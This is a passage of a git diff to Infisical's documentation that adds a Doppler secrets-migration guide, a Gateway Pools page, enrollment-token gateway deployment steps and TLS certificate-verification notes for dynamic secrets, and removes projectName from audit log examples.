Migrations", + "pages": [ + { + "group": "Doppler", + "pages": [ + "api-reference/endpoints/external-migrations/doppler/get-configs", + "api-reference/endpoints/external-migrations/doppler/create-config", + "api-reference/endpoints/external-migrations/doppler/update-config", + "api-reference/endpoints/external-migrations/doppler/delete-config", + "api-reference/endpoints/external-migrations/doppler/get-projects", + "api-reference/endpoints/external-migrations/doppler/get-environments", + "api-reference/endpoints/external-migrations/doppler/import-secrets" + ] + } + ] + }, { "group": "Other", "pages": [ diff --git a/docs/documentation/platform/audit-log-streams/audit-log-streams.mdx b/docs/documentation/platform/audit-log-streams/audit-log-streams.mdx index b2a1ccb964e..36386e3ff57 100644 --- a/docs/documentation/platform/audit-log-streams/audit-log-streams.mdx +++ b/docs/documentation/platform/audit-log-streams/audit-log-streams.mdx @@ -122,7 +122,6 @@ This prevents audit logs from being written to PostgreSQL while still streaming "userAgentType": "web", "eventType": "get-secrets", "eventMetadata": {}, - "projectName": "MyProject", "orgId": "00000000-0000-0000-0000-000000000000", "projectId": "00000000-0000-0000-0000-000000000000", "TimeGenerated": "2025-01-01T00:00:00.000Z" @@ -326,8 +325,7 @@ This prevents audit logs from being written to PostgreSQL while still streaming "createdAt": "2025-01-15T01:11:25.552Z", "updatedAt": "2025-01-15T01:11:25.552Z", "orgId": "785649f1-ff4b-4ef9-a40a-9b9878e46e57", - "projectId": "09bfcc01-0917-4bea-9c7a-2d320584d5b1", - "projectName": "example-project" + "projectId": "09bfcc01-0917-4bea-9c7a-2d320584d5b1" } ``` @@ -433,8 +431,4 @@ This prevents audit logs from being written to PostgreSQL while still streaming The `projectId` field will only be present if the event occurred at the project level, not the organization level. - - The name of the project where the event occurred. 
- The `projectName` field will only be present if the event occurred at the project level, not the organization level. - diff --git a/docs/documentation/platform/audit-logs.mdx b/docs/documentation/platform/audit-logs.mdx index 3352d944721..80a31f86121 100644 --- a/docs/documentation/platform/audit-logs.mdx +++ b/docs/documentation/platform/audit-logs.mdx @@ -58,7 +58,6 @@ Each log contains the following data: "updatedAt": "[TIMESTAMP]", "orgId": "[ORGANIZATION_UUID]", "projectId": "[PROJECT_UUID]", - "projectName": "[PROJECT_NAME]", "event": { "type": "get-secrets", "metadata": { diff --git a/docs/documentation/platform/dynamic-secrets/azure-sql-database.mdx b/docs/documentation/platform/dynamic-secrets/azure-sql-database.mdx index b95cadf015d..7c3a7bc160b 100644 --- a/docs/documentation/platform/dynamic-secrets/azure-sql-database.mdx +++ b/docs/documentation/platform/dynamic-secrets/azure-sql-database.mdx @@ -85,6 +85,10 @@ The user needs: SSL certificate authority certificate. For Azure SQL Database, this is typically not required as Azure manages the certificates. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/azure-sql-database/create-dynamic-secret-form.png) diff --git a/docs/documentation/platform/dynamic-secrets/cassandra.mdx b/docs/documentation/platform/dynamic-secrets/cassandra.mdx index b5251a346fe..41356838244 100644 --- a/docs/documentation/platform/dynamic-secrets/cassandra.mdx +++ b/docs/documentation/platform/dynamic-secrets/cassandra.mdx @@ -76,6 +76,10 @@ The above configuration allows user creation and granting permissions. A CA may be required if your cassandra requires it for incoming connections. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. 
+ + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-cassandra.png) diff --git a/docs/documentation/platform/dynamic-secrets/elastic-search.mdx b/docs/documentation/platform/dynamic-secrets/elastic-search.mdx index e27b030b496..c701d3f106d 100644 --- a/docs/documentation/platform/dynamic-secrets/elastic-search.mdx +++ b/docs/documentation/platform/dynamic-secrets/elastic-search.mdx @@ -89,6 +89,9 @@ The port that your Elasticsearch instance is running on. _(Example: 9200)_ A CA may be required if your DB requires it for incoming connections. This is often the case when connecting to a managed service. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-input-modal-elastic-search.png) diff --git a/docs/documentation/platform/dynamic-secrets/kubernetes.mdx b/docs/documentation/platform/dynamic-secrets/kubernetes.mdx index a7d16b11104..7f02faf0fd2 100644 --- a/docs/documentation/platform/dynamic-secrets/kubernetes.mdx +++ b/docs/documentation/platform/dynamic-secrets/kubernetes.mdx @@ -432,6 +432,9 @@ This feature is ideal for scenarios where you need to: Custom CA certificate for the Kubernetes API server. Leave blank to use the system/public CA. Not required when using Gateway authentication as the Gateway will use its internal TLS configuration. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + Choose between Token (API) or Gateway authentication. If using Gateway, the Gateway must be deployed in your Kubernetes cluster. 
diff --git a/docs/documentation/platform/dynamic-secrets/ldap.mdx b/docs/documentation/platform/dynamic-secrets/ldap.mdx index f1b0569f109..578ac59a1b4 100644 --- a/docs/documentation/platform/dynamic-secrets/ldap.mdx +++ b/docs/documentation/platform/dynamic-secrets/ldap.mdx @@ -56,6 +56,10 @@ The Infisical LDAP dynamic secret allows you to generate user credentials on dem CA certificate to use for TLS in case of a secure connection. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + The type of LDAP credential - select Dynamic. @@ -197,6 +201,10 @@ The Infisical LDAP dynamic secret allows you to generate user credentials on dem CA certificate to use for TLS in case of a secure connection. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + The type of LDAP credential - select Static. diff --git a/docs/documentation/platform/dynamic-secrets/mongo-db.mdx b/docs/documentation/platform/dynamic-secrets/mongo-db.mdx index b3112ce2622..191b6591c21 100644 --- a/docs/documentation/platform/dynamic-secrets/mongo-db.mdx +++ b/docs/documentation/platform/dynamic-secrets/mongo-db.mdx @@ -68,6 +68,9 @@ Create a user with the required permission in your MongoDB instance. This user w A CA may be required if your DB requires it for incoming connections. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. 
+ ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-mongodb.png) diff --git a/docs/documentation/platform/dynamic-secrets/mssql.mdx b/docs/documentation/platform/dynamic-secrets/mssql.mdx index 31b220e86a8..94d90b7e033 100644 --- a/docs/documentation/platform/dynamic-secrets/mssql.mdx +++ b/docs/documentation/platform/dynamic-secrets/mssql.mdx @@ -68,6 +68,10 @@ Create a user with the required permission in your SQL instance. This user will A CA may be required if your DB requires it for incoming connections. AWS RDS instances with default settings will requires a CA which can be downloaded [here](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.SSL.html#UsingWithRDS.SSL.CertificatesAllRegions). + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-mssql.png) diff --git a/docs/documentation/platform/dynamic-secrets/mysql.mdx b/docs/documentation/platform/dynamic-secrets/mysql.mdx index 475f7e338df..5de49177d4e 100644 --- a/docs/documentation/platform/dynamic-secrets/mysql.mdx +++ b/docs/documentation/platform/dynamic-secrets/mysql.mdx @@ -68,6 +68,10 @@ Create a user with the required permission in your SQL instance. This user will A CA may be required if your DB requires it for incoming connections. AWS RDS instances with default settings will requires a CA which can be downloaded [here](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.SSL.html#UsingWithRDS.SSL.CertificatesAllRegions). + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. 
+ + ![Modify SQL Statements Modal](../../../images/platform/dynamic-secrets/modify-sql-statement-mysql.png) diff --git a/docs/documentation/platform/dynamic-secrets/oracle.mdx b/docs/documentation/platform/dynamic-secrets/oracle.mdx index 74e139a013c..43cc8f50419 100644 --- a/docs/documentation/platform/dynamic-secrets/oracle.mdx +++ b/docs/documentation/platform/dynamic-secrets/oracle.mdx @@ -68,6 +68,10 @@ Create a user with the required permission in your SQL instance. This user will A CA may be required if your DB requires it for incoming connections. AWS RDS instances with default settings will requires a CA which can be downloaded [here](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.SSL.html#UsingWithRDS.SSL.CertificatesAllRegions). + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-oracle.png) diff --git a/docs/documentation/platform/dynamic-secrets/postgresql.mdx b/docs/documentation/platform/dynamic-secrets/postgresql.mdx index 9785e7d6692..bf190f05b34 100644 --- a/docs/documentation/platform/dynamic-secrets/postgresql.mdx +++ b/docs/documentation/platform/dynamic-secrets/postgresql.mdx @@ -69,6 +69,10 @@ Create a user with the required permission in your SQL instance. This user will A CA may be required if your DB requires it for incoming connections. AWS RDS instances with default settings will requires a CA which can be downloaded [here](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.SSL.html#UsingWithRDS.SSL.CertificatesAllRegions). + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. 
+ + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-postgresql.png) diff --git a/docs/documentation/platform/dynamic-secrets/rabbit-mq.mdx b/docs/documentation/platform/dynamic-secrets/rabbit-mq.mdx index 42c7a2d8785..4063d150381 100644 --- a/docs/documentation/platform/dynamic-secrets/rabbit-mq.mdx +++ b/docs/documentation/platform/dynamic-secrets/rabbit-mq.mdx @@ -73,6 +73,10 @@ The port that the RabbitMQ management plugin is listening on. This is `15672` by A CA may be required if your DB requires it for incoming connections. This is often the case when connecting to a managed service. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-input-modal-rabbit-mq.png) diff --git a/docs/documentation/platform/dynamic-secrets/redis.mdx b/docs/documentation/platform/dynamic-secrets/redis.mdx index 12ede82b91b..ab58c80723a 100644 --- a/docs/documentation/platform/dynamic-secrets/redis.mdx +++ b/docs/documentation/platform/dynamic-secrets/redis.mdx @@ -56,6 +56,10 @@ Create a user with the required permission in your Redis instance. This user wil A CA may be required if your DB requires it for incoming connections. This is often the case when connecting to a managed service. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. 
+ + ![Modify Redis Statements Modal](/images/platform/dynamic-secrets/modify-redis-statement.png) diff --git a/docs/documentation/platform/dynamic-secrets/sap-hana.mdx b/docs/documentation/platform/dynamic-secrets/sap-hana.mdx index 0d2348a8f7e..b0c12170e36 100644 --- a/docs/documentation/platform/dynamic-secrets/sap-hana.mdx +++ b/docs/documentation/platform/dynamic-secrets/sap-hana.mdx @@ -61,6 +61,10 @@ The Infisical SAP HANA dynamic secret allows you to generate SAP HANA database c + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-sap-hana.png) diff --git a/docs/documentation/platform/external-migrations/doppler.mdx b/docs/documentation/platform/external-migrations/doppler.mdx new file mode 100644 index 00000000000..4f8f3b3e6d3 --- /dev/null +++ b/docs/documentation/platform/external-migrations/doppler.mdx @@ -0,0 +1,80 @@ +--- +title: "Migrating from Doppler to Infisical" +sidebarTitle: "Doppler" +description: "Learn how to migrate secrets from Doppler to Infisical using in-platform migration." +--- + +This guide helps you bring secrets from **Doppler** into Infisical. Register a Doppler **App Connection** once, link it under **External Migrations**, then import secrets on demand β€” from the organization settings or directly from a project’s secret overview β€” into any Infisical project, environment, and folder you choose. + +**What you can migrate:** + +- **Secrets** β€” Key/value pairs from a Doppler **project** and **config** (root or branch) are imported into a chosen Infisical **project**, **environment**, and **secret path** (folder). Both root configs and branched configs are supported. 
+ + + Organization Admin Access Required: Creating and managing Doppler migration + configurations, listing Doppler projects and environments, and running + in-platform imports are limited to organization administrators, matching + the Vault in-platform migration model. + + +## Set Up Your Doppler Connection + + + + In **Doppler**, create an API token that can read the projects and configs you plan to import (for example a **Personal** or **Service** token with access to the right projects). + + Store the token securely; you will paste it into Infisical in the next step. + + + + + In Infisical, open **Organization Settings > App Connections** and add a new connection with the **Doppler** type. + + Provide the token and complete the connection flow. The connection is reused anywhere Infisical needs to talk to Doppler for migration. + + + + + Go to **Organization Settings > External Migrations**. + + Under **In-Platform Migration Tooling**, click **Add configuration**. In the provider chooser, select **Doppler**. + + ![Choose Doppler in the in-platform migration provider modal](/images/platform/external-migrations/doppler-in-platform/select-doppler-provider.png) + + Pick the **App Connection** you created (each row in the table is one linked connection). + + ![Doppler migration configuration modal](/images/platform/external-migrations/doppler-in-platform/doppler-connection-modal.png) + + + If you need several Doppler sources (for example different credentials), add multiple **Doppler** rows from **Add configuration**; each row can use a different App Connection. + + + The **In-Platform Migration Tooling** table lists all configured platforms (Vault and Doppler) together: **Platform**, **Namespace** (Vault shows the namespace path; Doppler shows **β€”**), and **Connection**. + + + + +## Migrating Secrets from Doppler to Infisical + +When you are already in a **Secret Manager** project and have **one** environment selected (not β€œall environments”): + +1. 
Open the **Secret overview** for the folder path where you want the secrets. +2. Open the **Add Secret** split button (caret next to **Add Secret**). +3. Choose **Add from Doppler**. + +![Add from Doppler on the secret overview](/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-option.png) + +4. Select the **Doppler project** and **config**; Infisical lists all configs including root configs and branch configs. Root configs are labeled with **(root)** for clarity. Infisical uses your linked migration configuration and imports into the **current** environment and path. + +![Import from Doppler modal on secret overview](/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-modal.png) + +## Next Steps + + + + Structure Infisical projects to mirror how you used Doppler projects and configs + + + Read imported secrets from applications using Infisical clients + + diff --git a/docs/documentation/platform/external-migrations/overview.mdx b/docs/documentation/platform/external-migrations/overview.mdx index d8e85fe9155..10b62c4147c 100644 --- a/docs/documentation/platform/external-migrations/overview.mdx +++ b/docs/documentation/platform/external-migrations/overview.mdx @@ -10,13 +10,19 @@ Infisical supports migrating resources from third-party secrets management platf Infisical offers two types of migration approaches: -- **In-Platform Migration Tooling**: Configure platform connections to enable granular, on-demand imports of secrets, policies, and configurations directly within the Infisical UI. This allows you to migrate resources incrementally as needed. +- **In-Platform Migration Tooling**: Connect supported platforms (for example HashiCorp Vault or Doppler) under **Organization Settings > External Migrations**, then run granular, on-demand imports of secretsβ€”and Vault-only features like policies and Kubernetes-related configurationβ€”directly in the Infisical UI. 
This allows you to migrate resources incrementally as needed. - **Bulk Data Import**: Perform one-time organization-level migrations to import all resources from external platforms at once. This is ideal for initial migrations when moving entirely to Infisical. ## Supported Platforms +**Bulk / one-shot organization import** + - [EnvKey](./envkey) -- [Vault](./vault) + +**In-platform migration (per-platform guides)** + +- [Vault](./vault) β€” KV secrets, Kubernetes auth and dynamic secret shapes, policy translation +- [Doppler](./doppler) β€” secrets from Doppler projects and environments We're always looking to add more migration paths for other providers. If we're missing a platform, please open an issue on our [GitHub repository](https://github.com/infisical/infisical/issues). diff --git a/docs/documentation/platform/external-migrations/vault.mdx b/docs/documentation/platform/external-migrations/vault.mdx index a67f2f30400..c6a0296ab7e 100644 --- a/docs/documentation/platform/external-migrations/vault.mdx +++ b/docs/documentation/platform/external-migrations/vault.mdx @@ -107,22 +107,22 @@ Before importing anything, you need to establish a secure connection between Inf - + Navigate to **Organization Settings > External Migrations** in Infisical. - Under the "In-Platform Migration Tooling" section for HashiCorp Vault, click **"+ Add Namespace"**. + Under **In-Platform Migration Tooling**, click **Add configuration**. In the provider chooser, select **HashiCorp Vault**. 
- ![In-Platform Migration Tooling](/images/platform/external-migrations/vault-in-platform/external-migration-overview.png) + ![Choose provider](/images/platform/external-migrations/vault-in-platform/select-migration-provider.png) - Configure your namespace: + Configure the Vault namespace entry: - ![Namespace Configuration](/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png) + ![Namespace configuration modal](/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png) - **Namespace**: Enter your Vault namespace path (e.g., `admin/namespace1`). If you intend to use the root namespace, set the namespace value to "root". - **Connection**: Select the App Connection you created in the previous step. - You can add multiple namespaces with different connections if you have multiple Vault instances or namespaces to migrate from. + You can add multiple Vault rows (different namespaces and/or connections) in the same table if you have several Vault instances or namespaces to migrate from. @@ -155,7 +155,11 @@ KV secrets are imported into a specific **environment** (e.g., Development, Stag ![Add Secret Dropdown](/images/platform/external-migrations/vault-in-platform/import-vault-secrets-option.png) -4. Choose your Vault namespace and the secret path you want to import (e.g., `secret/app/prod`) +4. Select your Vault namespace and one or more secret paths to import (for example, `secret/app/prod`). Keys are copied using their names from Vault. + + If you select multiple paths and the same key name exists in more than one of them, the import aborts and no secrets are saved. + + 5. 
Click **"Import Secrets"** ![Import Vault Secrets](/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png) diff --git a/docs/documentation/platform/gateways/gateway-deployment.mdx b/docs/documentation/platform/gateways/gateway-deployment.mdx index 0d81367754d..487eb9660fb 100644 --- a/docs/documentation/platform/gateways/gateway-deployment.mdx +++ b/docs/documentation/platform/gateways/gateway-deployment.mdx @@ -8,99 +8,23 @@ This guide covers everything you need to deploy and configure Infisical Gateways ## Deployment Steps -To successfully deploy an Infisical Gateway for use, follow these steps in order. - - - Create a machine identity with the correct permissions to create and manage gateways. This identity is used by the gateway to authenticate with Infisical and should be provisioned in advance. - The gateway supports several [machine identity auth methods](/documentation/platform/identities/machine-identities), as listed below. Choose the one that best fits your environment and set the corresponding environment variables when deploying the gateway. - - - - Simple and secure authentication using client ID and client secret. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=universal-auth` - - `INFISICAL_UNIVERSAL_AUTH_CLIENT_ID=` - - `INFISICAL_UNIVERSAL_AUTH_CLIENT_SECRET=` - - - - Direct authentication using a machine identity access token. - - **Environment Variables:** - - `INFISICAL_TOKEN=` - - - - Authentication using Kubernetes service account tokens. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=kubernetes` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - - - Authentication using AWS IAM roles. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=aws-iam` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - - - Authentication using GCP identity tokens. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=gcp-id-token` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - - - Authentication using GCP service account keys. 
- - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=gcp-iam` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - `INFISICAL_GCP_SERVICE_ACCOUNT_KEY_FILE_PATH=` - - - - Authentication using Azure managed identity. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=azure` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - - - Authentication using OIDC identity tokens. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=oidc-auth` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - `INFISICAL_JWT=` - - - - Authentication using JWT tokens. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=jwt-auth` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - `INFISICAL_JWT=` - - - - Ensure a relay server is running and accessible before you deploy any gateways. You have two options: - - **Managed relay (Infisical Cloud, US/EU only):** Managed relays are only available for Infisical Cloud instances in the US and EU regions. If you are using Infisical Cloud in these regions, you can use the provided managed relay. - - **Self-hosted relay:** For all other cases, including all self-hosted and dedicated enterprise instances of Infisical, you must deploy your own relay server. You can also choose to deploy your own relay server when using Infisical Cloud if you require reduced geographic proximity to your target resources for lower latency or to reduce network congestion. For setup instructions, see the [Relay Deployment Guide](/documentation/platform/gateways/relay-deployment). + Ensure a relay server is running and accessible before you deploy any gateways. You have two options: + - **Managed relay (Infisical Cloud, US/EU only):** If you are using Infisical Cloud in the US or EU regions, you can use the provided managed relay. + - **Self-hosted relay:** For all other cases, you must deploy your own relay server. See the [Relay Deployment Guide](/documentation/platform/gateways/relay-deployment). + + + 1. Navigate to **Organization Settings > Networking > Gateways**. + 2. Click **Create Gateway**. 
+ ![Create Gateway button](/images/platform/gateways/gateway-create-button.png) + 3. Enter a name for your gateway and select a relay (or use "Auto Select Relay"). + ![Create Gateway form](/images/platform/gateways/gateway-create-form.png) + 4. Choose your deployment method (CLI or systemd). + 5. Copy the generated CLI command. The command includes a one-time enrollment token that expires in 1 hour. - Make sure the Infisical CLI is installed on the machine or environment where you plan to deploy the gateway. The CLI is required for gateway installation and management. - - See the [CLI Installation Guide](/cli/overview) for instructions. + Make sure the Infisical CLI is installed on the target machine. See the [CLI Installation Guide](/cli/overview) for instructions. Ensure your network and firewall settings allow the gateway to connect to all required services. All connections are outbound only; no inbound ports need to be opened. @@ -114,85 +38,59 @@ To successfully deploy an Infisical Gateway for use, follow these steps in order If you are in a corporate environment with strict egress filtering, ensure outbound TCP 2222 to relay servers and outbound HTTPS 443 to Infisical API endpoints are allowed. - - The Infisical CLI is used to install and start the gateway in your chosen environment. The CLI provides commands for both production and development scenarios, and supports a variety of options/flags to configure your deployment. + + Run the command you copied from the UI on the target machine. This single command enrolls the gateway and starts it immediately. - To view all available flags and equivalent environment variables for gateway deployment, see the [Gateway CLI Command Reference](/cli/commands/gateway). 
- For production deployments on Linux servers, install the Gateway as a systemd service so that it runs securely in the background and automatically restarts on failure or system reboot: + For production deployments on Linux, install as a systemd service: ```bash - sudo infisical gateway systemd install --token --domain --name + sudo infisical gateway systemd install \ + --enroll-method=token \ + --token= \ + --domain= sudo systemctl start infisical-gateway ``` - - By default, the gateway connects to the most optimal relay. Use the `--target-relay-name` flag to manually specify a different relay server. - - The systemd install command requires a Linux operating system with root/sudo privileges. - - - For production deployments on Kubernetes clusters, install the Gateway using the Infisical Helm chart: - - #### Install the latest Helm Chart repository - - ```bash - helm repo add infisical-helm-charts 'https://dl.cloudsmith.io/public/infisical/helm-charts/helm/charts/' - helm repo update - ``` - - #### Create a Kubernetes Secret - - The gateway supports all identity authentication methods through environment variables: - - ```bash - kubectl create secret generic infisical-gateway-environment \ - --from-literal=INFISICAL_AUTH_METHOD=universal-auth \ - --from-literal=INFISICAL_UNIVERSAL_AUTH_CLIENT_ID= \ - --from-literal=INFISICAL_UNIVERSAL_AUTH_CLIENT_SECRET= \ - --from-literal=INFISICAL_GATEWAY_NAME= - ``` - - - By default, the gateway connects to the most optimal relay. Use the `--from-literal=INFISICAL_RELAY_NAME=` flag to manually specify a different relay server. 
- - - #### Install the Gateway - - ```bash - helm install infisical-gateway infisical-helm-charts/infisical-gateway - ``` - - - For development or testing environments: - + For development or testing, run directly in the foreground: ```bash - sudo infisical gateway start --token --name= + infisical gateway start my-gateway \ + --enroll-method=token \ + --token= \ + --domain= ``` - - - By default, the gateway connects to the most optimal relay. Use the `--target-relay-name` flag to manually specify a different relay server. - - + + The enrollment token can only be used once and expires after 1 hour. If it expires, use the **Re-enroll** option in the gateway's context menu to generate a new one. + + + + You can safely re-run the same command to restart the gateway. It will detect the token has already been used and skip enrollment automatically. + + After deployment, verify your gateway is working: + 1. **Check logs** for "Gateway started successfully" message. + 2. **Verify registration** in the Infisical UI. Navigate to **Networking > Gateways** and confirm the gateway shows a "Healthy" status. + 3. **Test connectivity** by creating a resource that uses the gateway to access a private service. + + - 1. **Check logs** for "Gateway started successfully" message indicating the gateway is running and connected to the relay +### Re-enrollment - 2. **Verify registration** in the Infisical by visiting the Gateways section of your organization. The new gateway should appear with a recent heartbeat timestamp. +To move a gateway to a different machine or regenerate its credentials: - 3. **Test connectivity** by creating a resource in Infisical that uses the gateway to access a private service. Verify the resource can successfully connect through the gateway. - - +1. Click the context menu (three dots) next to the gateway and select **Re-enroll**. +2. Copy the new CLI command and run it on the new machine. +3. 
The existing gateway continues running until the new machine enrolls. Once the new machine connects, the old machine's credentials are automatically revoked. This enables zero-downtime machine migrations. ## Frequently Asked Questions @@ -234,11 +132,7 @@ If the gateway cannot connect to the relay: -If you encounter authentication failures: - -1. Verify machine identity credentials are correct -2. Check token expiration and renewal -3. Ensure authentication method is properly configured +Ensure the enrollment token has not expired or already been used. If the gateway was re-enrolled, the old machine's credentials are no longer valid. You can generate a new enrollment token using the **Re-enroll** option in the gateway's context menu. @@ -248,15 +142,24 @@ Check gateway logs for detailed error information: ```bash sudo journalctl -u infisical-gateway -f ``` -- **Kubernetes:** - ```bash - kubectl logs deployment/infisical-gateway - ``` - **Local installation:** Logs appear in the terminal where you started the gateway - -For systemd-based installations, the gateway's configuration file is stored at `/etc/infisical/gateway.conf`. You may reference or inspect this file for troubleshooting advanced configuration issues. + +Enrollment tokens expire after 1 hour. If the token expires before you run the CLI command, click the context menu (three dots) next to the gateway and select **Re-enroll** to generate a new token. + + + +Each gateway's access token and domain are saved to a config file scoped by gateway name: + +- **Running as root/sudo:** `/etc/infisical/gateways/.conf` +- **Running as a regular user:** `~/.infisical/gateways/.conf` + +This allows multiple gateways to run on the same machine without conflicting. For systemd-based installations, the configuration is at `/etc/infisical/gateway.conf`. All config files are created with restricted permissions (0600) so only the owner can read them. + + + +Yes. 
Each gateway stores its credentials in a separate config file scoped by name (e.g., `~/.infisical/gateways/my-gateway.conf`). You can enroll and start multiple gateways in separate terminal sessions using different names. diff --git a/docs/documentation/platform/gateways/gateway-pools.mdx b/docs/documentation/platform/gateways/gateway-pools.mdx new file mode 100644 index 00000000000..271241740ca --- /dev/null +++ b/docs/documentation/platform/gateways/gateway-pools.mdx @@ -0,0 +1,89 @@ +--- +title: "Gateway Pools" +sidebarTitle: "Gateway Pools" +description: "High availability and automatic failover for gateways" +--- + +Gateway Pools provide high availability for your gateway infrastructure. A pool is a named collection of gateways that all have connectivity to the same private network. When the platform needs to reach a resource through a pool, it automatically routes through a healthy gateway, providing failover if any individual gateway goes down. + + + Gateway Pools is an enterprise feature. Self-hosted users can contact + [sales@infisical.com](mailto:sales@infisical.com) to purchase an enterprise + license. + + +## How It Works + +1. You create a Gateway Pool and add multiple gateways that share network access to the same resources. +2. When configuring a consumer (e.g., Kubernetes Auth), you select the pool instead of an individual gateway. +3. At request time, the platform picks a random healthy gateway from the pool and routes through it. +4. If a gateway goes down, subsequent requests automatically route through the remaining healthy gateways. + +A gateway is considered healthy if it has sent a heartbeat within the last hour and its last health check did not fail. + +## Creating a Gateway Pool + +1. Navigate to **Organization Settings > Networking > Gateways**. +2. Click the **Gateway Pools** tab. + +![Gateway Pools Switch](../../../images/platform/gateways/gateway-pools-switch.png) + +3. Click **Create Pool**. 
+ +![Gateway Pools Tab](../../../images/platform/gateways/gateway-pools-tab.png) + +4. Enter a name for the pool and click **Create Pool**. + +![Create Gateway Pool](../../../images/platform/gateways/gateway-pools-create.png) + +## Adding Gateways to a Pool + +1. In the **Gateway Pools** tab, click on a pool to open its detail view. + +![Click on a pool](../../../images/platform/gateways/gateway-pools-click-pool.png) + +2. Click **Add Gateway** and select a gateway from the dropdown. + +![Add gateway to pool](../../../images/platform/gateways/gateway-pools-add-gateway.png) + +3. Repeat for each gateway you want to add. + +A gateway can belong to multiple pools if it has connectivity to resources served by each pool. Pool membership can be changed at any time without restarting the gateway. + +## Using a Pool in a Consumer Config + +Anywhere you configure a gateway, the gateway picker dropdown shows both individual gateways and gateway pools. Pools are listed under the "Gateway Pools" section with an **HA** (high availability) badge and health status. + +When you select a pool, the platform validates connectivity through one of its healthy gateways before saving. + +## Gateway Selection + +When a request is routed through a pool, the platform picks a gateway at random from the pool's healthy gateways. There is no round-robin or weighted selection. + +## Pool Health + +Each pool displays an aggregate health status based on its gateways: + +- **Green** (e.g., "3/3 healthy") - All gateways are healthy +- **Yellow** (e.g., "2/3 healthy") - Some gateways are unhealthy +- **Red** (e.g., "0/3 healthy") - All gateways are unhealthy + +If all gateways in a pool are unhealthy when a request is made, the request fails with a descriptive error. + +## FAQ + + + + No. A pool cannot be deleted if it is referenced by any consumer configurations (e.g., Kubernetes Auth). You must first update those configurations to use a different gateway or pool before deleting. 
+ + + Each pool shows a count of connected consumer configurations in the table. Click the count to see the full list with links to each resource. + + + The request fails with a descriptive error. You should ensure at least one gateway in the pool is online and has a recent heartbeat. + + + Yes. A gateway can belong to as many pools as needed, as long as it has connectivity to the resources served by each pool. + + + diff --git a/docs/documentation/platform/gateways/overview.mdx b/docs/documentation/platform/gateways/overview.mdx index 33945337b69..b3f77efe4ee 100644 --- a/docs/documentation/platform/gateways/overview.mdx +++ b/docs/documentation/platform/gateways/overview.mdx @@ -65,6 +65,10 @@ To monitor their operational status, both gateways and relays transmit hourly he Infisical automatically notifies all organization admins of unhealthy gateway or relay statuses through email and in-app notifications. +## High Availability with Gateway Pools + +For production workloads, you can group multiple gateways into a **Gateway Pool** to provide automatic failover. When a gateway in a pool goes down, the platform routes through a healthy member automatically. See [Gateway Pools](/documentation/platform/gateways/gateway-pools) for details. + ## Getting Started Ready to set up your gateway? Follow the guides below. @@ -73,11 +77,14 @@ Ready to set up your gateway? Follow the guides below. Deploy and configure your gateway within your network infrastructure. + + Set up high availability with gateway pools for automatic failover. + + + Set up relay servers if using self-deployed infrastructure. - - Learn about the security model and implementation best practices. 
